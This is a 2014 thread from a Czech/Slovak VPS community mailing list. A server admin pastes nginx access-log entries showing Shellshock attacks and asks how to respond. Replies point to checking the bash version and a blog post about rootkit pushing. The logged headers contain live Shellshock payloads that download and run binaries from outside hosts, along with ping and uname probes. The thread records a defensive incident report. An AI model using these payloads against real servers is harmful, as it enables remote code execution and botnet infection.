[vpsFree.cz: community-list] {Disarmed} Re: {Disarmed} {Disarmed} Re: Útoky na bash běží

Ja mam v logoch nasledovne

root@yuna /home/rene # grep '() {' /var/log/nginx/* /var/log/nginx/access.log:70.42.149.67 - - [28/Sep/2014:08:18:37 +0200] "GET /test HTTP/1.0" 200 193 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z *MailScanner has detected a possible fraud attempt from "74.201.85.69" claiming to be* *MailScanner warning: numerical links are often malicious:* 74.201.85.69/ec.z;chmod <http://74.201.85.69/ec.z;chmod> +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22" /var/log/nginx/access.log:70.42.149.67 - - [28/Sep/2014:08:18:37 +0200] "GET / HTTP/1.0" 200 193 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z *MailScanner has detected a possible fraud attempt from "74.201.85.69" claiming to be* *MailScanner warning: numerical links are often malicious:* 74.201.85.69/ec.z;chmod <http://74.201.85.69/ec.z;chmod> +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22" /var/log/nginx/access.log:70.42.149.67 - - [28/Sep/2014:08:18:37 +0200] "GET /cgi-bin/test.sh HTTP/1.0" 200 193 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z *MailScanner has detected a possible fraud attempt from "74.201.85.69" claiming to be* *MailScanner warning: numerical links are often malicious:* 74.201.85.69/ec.z;chmod <http://74.201.85.69/ec.z;chmod> +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22" /var/log/nginx/access.log.1:209.126.230.72 - - [25/Sep/2014:07:26:09 +0200] "GET / HTTP/1.0" 200 193 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan

+0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 200 193 "-" "() { :;}; /bin/ping -c 1 198.101.206.138" /var/log/nginx/access.log.1:54.251.83.67 - - [27/Sep/2014:21:35:34 +0200] "GET / HTTP/1.1" 200 193 "-" "() { :;}; /bin/bash -c \x22echo testing9123123\x22; /bin/uname -a" /var/log/nginx/access.log.1:137.189.52.234 - - [27/Sep/2014:23:18:23 +0200] "GET /cgi-bin/test-cgi HTTP/1.0" 200 193 "-" "() { :;}; /bin/bash -c \x22wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh\x22"

vyzera to trochu zle :-/ ... co odporucate s tym robit? killnut len podozrive procesy? a pohladat nejake stopy po tom, ci sa nezapinaju po restarte?

2014-09-29 10:10 GMT+02:00 Michal Miklos &lt;mimik(a)mimik.sk <mailto:mimik@mimik.sk>>:

jedine si zistit ci mas dobru verziu bashu.

On 29 Sep 2014, at 10:08, Jan B. Kolář &lt;janbivoj.kolar(a)zazen-nudu.cz <mailto:janbivoj.kolar@zazen-nudu.cz>> wrote:

byl úspěšný či nikoliv? > > Honza > > On 29.9.2014 10 <tel:29.9.2014%2010>:02, Petr Krcmar wrote: >> Dne 29.9.2014 v 09:57 Jiří Medvěd napsal(a): >>> Hele, >>> >>> z jineho stroje: >> Ano, to jsem našel taky. Zjevně se tam někdo snaží tlačit >> rootkit: >> >> http://petrkrcmar.blog.root.cz/2014/09/29/utoky-na-bash-uz-bezi/

<mailto:Community-list@lists.vpsfree.cz> > http://lists.vpsfree.cz/listinfo/community-list

_______________________________________________ Community-list mailing list Community-list(a)lists.vpsfree.cz <mailto:Community-list@lists.vpsfree.cz> http://lists.vpsfree.cz/listinfo/community-list

_______________________________________________ Community-list mailing list Community-list(a)lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list